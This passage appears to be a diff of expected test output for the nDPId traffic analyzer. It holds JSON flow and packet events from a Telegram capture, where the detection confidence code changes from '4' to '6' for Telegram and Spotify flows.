02263{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1588779634794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1588779634794,"pkt":"KDc3AG3IEBMx8Tl2CABFAAViAABAADcR1xbYOs1EwKgBTQG78hYFTlCg01EwNDYFozVJE19KlwkAAAABlFnOyl1IE6Kl9p2lJqJe20wr+YJJK3OQaQI+K1yyeZR9yLW3lS\/Tdnt9xcKqAlOjTi1OwA2w6a7+tRtr3KAKpiTPSke9Qgxq9RZuUGOobpscabZyRsqHgng7hPe2XFawQxldFDSjxKnYQdE5FFv9BpDrnq\/TTXf9TFvgw\/QnXVAz5Cyt9UqBUF1hH0e8eHxu6vo8lxkhnIhe5h6hLOoAm1BnioEr9hnRo4ORCSZRNuTGnhroEuVGyj5HhhPz45sTADcZH\/aRhJy7qwSQPpjxKMRjwHfkXW+yFpSOG3Hp5CsHedxutEJhnZDI+4BG1I6mpoDE8Zvk+SOrrxTdABEKpyABqDKs78QbQi9n46y46LF2JTAo36T9cjW0OkfnS1dX8RBGe5tpl\/GX8HAEOsAa\/z+6O4B5WSOIZhf34xGOy\/N3OFC+u9lN+ttVyLf++3WOzpd57ZzPwtC+yE\/BNwbA4eO5JHsp6kPUffzjzL5K4L4obRfRfmFzgUJr2AvlNCCKETOUv9FcgCj+O3Ce2J+FzvWWvPIvOKN37xrUN\/mjFcjn6vrnzc3WHSBHZUUQPgLL9gdUFNa8\/yQjJhbGLlt8bvQA1SJaoWXDVmYJjnjFSJJFF8RWpizfJP35dxquwrjEwUged8l6McoK7qHu4Ld19f6o8UJyTgkxjnhmujMkW40UK64Bo1F6vaXjIzepbsvzrfPs4buhFyCPcm2wLFZq5nMbYvmNgbBAMNYgQ7+Y4Zo47U6dIvcnsHay4b8rdIZC\/Ra4RUg2MEAVMY04nZVwsS9kMvxjw7tWpuLXdlQCjlvuGOf6dZ6k9rHdaI3URstXL6UuWo0Gdj\/NtiaGySmIHVV6i7EbmaJp3uFyYDnUvrIMjfc6ghlolVGsZni+GAZQbXnpWH5ualh+GQk\/IS2IEz0uyBJ6dsYticBr8EFAQR7hHY\/3OyEr27WwpwoLmUJn9UQqUUNET0+qTxL027bZTqGeTGLe2rH0z4qd78Ue12s\/mmitdGeaTOEIB+kN9Oz976ydi7i+SoMBr\/+hKLj5gjHsfiNqAK8opkFFxqyBh0nqOBdwUSl8gZVmShAcuOo649XW2Yut5pCeSZfn3ZoRq+lWx89wdySCjOMW8exEEWunv6bjn3slpy7AmRkw+sPRuDmUtrstSTMggBfN+zYz4kU9msu81pr+IK0y7aQh4mmTipBI3toWvtKGgxtFFCU+90ZF+2e26g7ax+JPhJWCf1aeqV2qjVTswyDUe+X8YVqx5YC7ACn0pIzEQj12x8eSFM60TkG8kXSrR+cBcSE4aaYhrAy3pypcCtMV26Co80JeaaDwDMCwmVAzo0E\/BwpqMknzmJBeyZjvON\/562D3ZU9nDxApe4H14sNeh3KyKanbNvTWcgxWJPs+wQ9X1d9egrD3CNpHov7eGsS9E5PTryqkw6dcr07anAdXKz39OKneC7uTIi2xMN4pi9HDUne9kKxezY6JaiaaEds0Egs5TrKu5MlMzp7QSr1MmDFu7VQLrafQLtQSQLw0f+CkdiOkRSoewADHR7WnRu3Pw\/1y7ALeor+7d7v\/xVkXtV0+u1JaX2B1bUYYuBQruUl0bp5QCHut4tI5G7u+9P1dYnUX\/rSklohEaFv70M62kLeKCl4bX8BdPalaH0yKRZF9q2iCLDdluLwx+pd3G8lRNNpU8gMggNTI9z\/7Pxs0oOqfN32KINp0rOMXmr0ZD6E5U7SeSuShxUVrIQgXkF5QTsc4zAeYQXZrfPFcKANcrPTz3MqQYdpM"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1588779634795,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1588779634795,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4emwAAEARmNTAqAFN2DrNRPIWAbsAJN5oQKM1SRNfSpcJAg\/VJy\/hU5JXfMk208XyiTI7oA=="} 02273{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1588779634797,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1588779634797,"pkt":"KDc3AG3IEBMx8Tl2CABFAAViAABAADgR1hbYOs1EwKgBTQG7xoYFTqbf01EwNDYFdSQ0JxgV+\/AAAAAB\/upOH6rH2BIyQSeP5oglrVNRjLzUPYUddHT9m6BsmcKmApdlysrOkxHuxx9vijlyM8wYkq7JvX19IQMhKJZA0U6a8sLp7rHlGFo5nqmm0jMnW7WPHt\/LNpmp9sMej9LIYl7HVWlYuGONw23gJgIuAlpWAO6yh+eVnrhPvfDTj31c6\/L1ooPLrq5NV7Gc7jNhPXAjTc4ZaIElGMpTUieuhBDEobdC\/yRUwhIJac7BNwvPjcF+IDwdoZlLRJw3R5oXAi2b\/NF4EAf1KMRYvNmplcTy11GLuiSvRAmihe5Rh\/orc2nsZbWj+vVmUmzCiWHVssa5KLzmBbkyMh6lJPB3gwNR9L\/Fq9yeGKy0+1JnwE4BdYx5u8HLnX2wgYVFT\/rFfn1Oc62CdMeazmAG7K4pybekkUnanBSVSlDsTtacnk6lBahTKCPl4BKZo41FpeNyrCv6CdLYcTHgeBE4YGrMXUeFT\/ilVEPrTMzFe5kzHIStA3AKnuB\/P+S0D02eLWMotPjv93++mmxST6HP114UWR5QNEIWRxUS8RL0hQeu4zY97Ng6cw4CKN+Csj\/ZvkP4kxD\/Zq7tP6yj9mYvYIO9zExfP9oeGiwS\/4f+6unIp0FdFoZmq8bqYOIOw8QtYVOoNnStryjcigG\/awK2ZaMXV+46Pnbc7phNOyTwsLBxxc\/12QJJ45cSQCeX9fI3HOGC6Lef+EyN3wVq9oB+wBoxI5umm0icT\/zZ2yvFo6UFJ2uDstyecW1AqbCfnn6WWrQLz6eMr+vL\/JleVbbatuBYa5gdk2Yt+67fkdck3Dk3mkph8oGaf+SDkR7Tf9p8ulHM4RwOnQJFlNf4xkSWeQGBLD6wjBE4rkLONEpat+rbynMjiBPAofixsPnISwVDLf0nq9DMrjUvdWlIIMyhGej2e24qnTkMu6p7FC\/huIoB0mRmYhHnBPlCQn\/LUzArFEcNys29X1cxw25iplZFvHkHdOc24AY5G54G00MdsxNdaE\/paJZz93dfFlaEUpxXdsPnTzUS4pfi+tXdLdZlCDSCbcoeLXsZ10o3zvR7bkNwPdSYObv6FtEohnNHd5N8A7GThnHg9zUXltLPSF3xHvq8673iVUYgBtPyG5IX44udpmQI7jeus04VvFTz2gu4npRTD34iJ0hoN0ntT0nFkqcX5\/lL09qWjNDuFP\/S1ls4UAok+2ha5s3PvhtAKIlco7aoWYLrSj95gTSsEvt+vv6BHLLnycSfEmJgy7LNVNyoUK4C4+9WgT1JfWOmVbGaY23xkwzP15QjiTTdKIEkJwiBmgJIruM0dA1J41jJPUcFpH8opFJyrh1InbMhpwrdsem5Er87sEkX0BhYPXkyvKucSZm6W1RMofNDgCdyw5TOBfDKdoqNmc54r82qBE2FvdTks67OsedSUGg\/xIKev6elshEbqcaKfcXRRyuerRJ9Na1ZC85buNS0\/0S8Uk1MnuNcWLIniDOgLmxDYioY8+6ffXPskGoeJ6mpsWIPFN\/ZXPivRS+0hFla3abk42RYHrYiht3fXvADKY3mvEEwWMSzU84L2ho8ij4vLNJYBjTvbpsEkPGMqANA85Spe5XJ9p4g9hQurfHWfSLDKdhStCgrn8jpcM\/\/FkUBZViwdPAW2JLOvsdSXQXeDGKI7nTEgI0kYpnr4frOKaPCHqb3HEqFHSRiARTSD0ufyxhTd6AYnG3WyBQ7hHD\/6lTnreRmZxISZ6q\/gFRJTubvR8\/BO8IvV1XaeMgD55oE\/mi7ALMHyuc8OmMt"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1588779634797,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1588779634797,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4M8YAAEAR33rAqAFN2DrNRMaGAbsAJKIhQHUkNCcYFfvwAo2OXEY+ceV4qFvU3oSjW1YxGw=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1588779636498,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1588779636498,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1588779636498,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABIkKQAAEARZWTAqAFNwKgB\/+EV4RUANJmxU3BvdFVkcDBukus1wI\/JPgABAARIlcIDfp+BivWMmwGHLE6mtUd\/uj\/4zNc="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1588779636498,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1588779636498,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABETKwAAEARCJTAqAFNW2wICG32AhEAMEyhL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/8Sf7Krq21RXQ=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEp8EAAEARpYXAqAFNW2wQAW32AhEAMJ\/zL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/9gDcREEDsyHQ=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABE6yEAAEARZiPAqAFNW2wMA232AhIAMCHWL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/+2+xugMe3kOw=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEy+YAAEARiWDAqAFNW2wIAW32AhUAMEz1L+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/+LrTXW6BYYCg=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEayUAAEAR5h3AqAFNW2wMBW32AhkAMN01L+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/+U8S0SsiW5Mg=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1588779637543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779637543,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEEQsAAEARPDrAqAFNW2wQA232AhkAMF6eL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/Ppp3gSInx5A=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637543,"flow_last_seen":1588779637543,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779637543,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1588779637560,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1588779637560,"pkt":"EBMx8Tl2KDc3AG3ICABFAABF+GQAAP8RP6TAqAFNwKgBAdVDADUAMZzqakQBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1588779637572,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1588779637572,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB67hUAAEARCL\/AqAEBwKgBTQA11UMAZgAAakSBgwABAAAAAQAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAHAGwAGAAEAAAA0ACkFZG5zZG\/AGwpwb3N0bWFzdGVywBt4ZvNkAACowAAAHCAAJOoAAAACWA=="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":741,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779629079,"flow_last_seen":1588779637572,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1588779637572,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": 